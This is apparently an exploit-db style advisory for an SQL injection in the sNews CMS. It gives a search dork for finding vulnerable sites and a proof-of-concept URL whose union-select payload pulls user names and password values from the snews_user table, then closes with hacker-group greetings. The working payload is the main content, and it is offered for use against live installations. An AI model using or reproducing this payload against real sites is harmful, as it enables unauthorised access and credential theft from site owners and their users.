____ ____ ____ _______/|________ ____ ____ /_ \ /\_/ __ \ /___/\ __\___ \_/ __ \_/ __ \ (<_> ) |\___/ \___ \|||| \/\___/\___/ \____/|___|/\___>____> |_ ||__|\___>\___> \/ \/ \/\/ \/ # Exploit Title : CMS snews SQL Injection Vulnerability # Author: By onestree # Software Link : http://snewscms.com/ # tested: ubuntu 12.10 / win 7 # Dork: inurl:"tanyakan pada rumput yang bergoyang" ************************************************************* SQL poc: http://localhost/snews/snews.php?act=shownews&id=[SQL] Example: http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/* Thanks : Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell indonesiancoder - moeslimh4x0r - go-coder spesial my hunny :*
体验盒子
